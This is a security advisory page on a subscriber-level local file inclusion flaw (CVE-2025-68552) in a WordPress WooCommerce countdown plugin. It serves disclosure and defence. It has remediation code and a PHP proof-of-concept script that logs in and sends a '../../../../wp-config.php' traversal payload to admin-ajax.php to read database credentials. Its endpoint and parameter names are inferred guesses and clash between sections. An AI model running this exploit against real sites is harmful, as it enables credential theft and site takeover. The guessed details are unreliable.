Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-68552: WooCommerce Coming Soon Product with Countdown <= 5.0 – Authenticated (Subscriber+) Local File Inclusion (woo-coming-soon-product)

Severity: High (CVSS 7.5)
CWE: 98
Vulnerable Version: 5.0
Patched Version:
Disclosed: February 9, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-68552 (metadata-based):
This vulnerability is an authenticated Local File Inclusion (LFI) flaw in the WooCommerce Coming Soon Product with Countdown plugin for WordPress. The flaw exists in version 5.0 and earlier, allowing attackers with subscriber-level access or higher to include arbitrary files from the server. Successful exploitation can lead to remote code execution, particularly when combined with file upload capabilities for seemingly benign file types.

Atomic Edge research infers the root cause is improper sanitization of user-controlled input used in a PHP include or require statement (CWE-98). The plugin likely uses a parameter, such as a file path or template name, to dynamically include PHP files without validating the supplied value. This allows directory traversal sequences (e.g., `../../../`) to escape the intended directory. These conclusions are inferred from the CWE classification and vulnerability description, as the source code diff is unavailable for confirmation.

Exploitation likely occurs via a WordPress AJAX endpoint or a direct plugin file request. An authenticated attacker would send a POST or GET request to a handler like `/wp-admin/admin-ajax.php` with an `action` parameter containing a plugin-specific hook (e.g., `woo_coming_soon_product_action`). The request would include a malicious parameter, such as `file` or `template`, containing a relative path to a target PHP file (e.g., `../../../../wp-config.php`) or an uploaded file containing PHP code. The server would then include and execute that file’s contents.

The patch in version 5.1 likely implements strict validation of the user-supplied filename. Remediation should involve whitelisting allowed file paths or basenames, removing directory traversal sequences (`../`), and ensuring the file extension matches an expected, non-executable type (like `.css` or `.txt`). The fix may also add a capability check stricter than the default subscriber role.
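The remediation pattern described above, written out as an added example rather than the plugin's own code (whose real parameter and hook names are not known from the metadata). The function names, the `templates` directory, the allowlist entries, the AJAX action and the nonce name are all assumptions:

```php
<?php
// Added example (not the plugin's code): a hardened template loader of the
// kind the remediation above describes. Function, hook, nonce and directory
// names are assumptions; the real plugin's parameter names are unknown.

declare(strict_types=1);

// Vulnerable pattern implied by the CWE-98 classification: the request value
// reaches include() unchanged, so '../' walks out of the template directory.
//   include plugin_dir_path(__FILE__) . 'templates/' . $_POST['template'];

// Hardened resolver: allowlist of bare basenames, fixed '.php' extension, and
// a realpath() containment check as a second, independent layer.
function wcsp_resolve_template(string $requested, string $template_dir): ?string
{
    static $allowed = ['countdown', 'coming-soon', 'notify-me']; // assumed names

    if (!in_array($requested, $allowed, true)) {
        return null; // anything that is not an allowlisted basename is rejected
    }
    $base = realpath($template_dir);
    $path = realpath($template_dir . DIRECTORY_SEPARATOR . $requested . '.php');
    if ($base === false || $path === false) {
        return null; // directory or template file does not exist
    }
    // The resolved file must sit inside the template directory.
    if (strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// AJAX handler with an explicit capability check and nonce check; wp_ajax_*
// hooks fire for any logged-in user, subscribers included, so a capability
// stricter than "is authenticated" is required.
function wcsp_ajax_render_template(): void
{
    if (!current_user_can('manage_woocommerce')) {
        wp_send_json_error('forbidden', 403);
    }
    check_ajax_referer('wcsp_template_nonce', 'nonce');

    $requested = isset($_POST['template']) ? sanitize_key(wp_unslash($_POST['template'])) : '';
    $path = wcsp_resolve_template($requested, plugin_dir_path(__FILE__) . 'templates');
    if ($path === null) {
        wp_send_json_error('invalid template', 400);
    }
    include $path;
    wp_die();
}
add_action('wp_ajax_wcsp_render_template', 'wcsp_ajax_render_template');
```

`sanitize_key()` strips everything outside `[a-z0-9_-]`, so traversal sequences never reach the resolver; the allowlist and `realpath()` check still hold if that filter is ever bypassed or removed.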

The impact of this vulnerability is high. Attackers can read sensitive files like `wp-config.php` to obtain database credentials. If the attacker can upload a file with a `.jpg` extension containing PHP code, they can include it to achieve full remote code execution. This bypasses access controls and can lead to complete site compromise, data theft, and server-side backdoor installation.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-68552 - WooCommerce Coming Soon Product with Countdown <= 5.0 - Authenticated (Subscriber+) Local File Inclusion
/*
Assumptions:
1. The vulnerability is triggered via an AJAX action named 'wc_cspc_action' (inferred from plugin slug 'woo-coming-soon-product').
2. The vulnerable parameter is named 'template' or 'file'.
3. The attacker has subscriber-level credentials.
4. The target server runs PHP and allows local file inclusion.
*/

$target_url = 'http://vulnerable-site.com';
$username = 'subscriber_user';
$password = 'subscriber_pass';

// Step 1: Authenticate to WordPress and obtain session cookies
$login_url = $target_url . '/wp-login.php';
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
)));
$response = curl_exec($ch);

// Step 2: Exploit the Local File Inclusion via the suspected AJAX endpoint
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array(
    'action' => 'wc_cspc_action', // Inferred AJAX action hook
    'template' => '../../../../wp-config.php' // Attempt to include WordPress config file
)));
$response = curl_exec($ch);
curl_close($ch);

// Step 3: Check response for evidence of successful inclusion
if (strpos($response, 'DB_NAME') !== false || strpos($response, '<?php') !== false) {
    echo "[+] Potential LFI successful. Check output for sensitive data.\n";
    echo substr($response, 0, 2000); // Print first 2000 chars of response
} else {
    echo "[-] Exploit attempt may have failed or endpoint/parameter is incorrect.\n";
    echo "Response length: " . strlen($response) . "\n";
}

unlink('cookies.txt');
?>
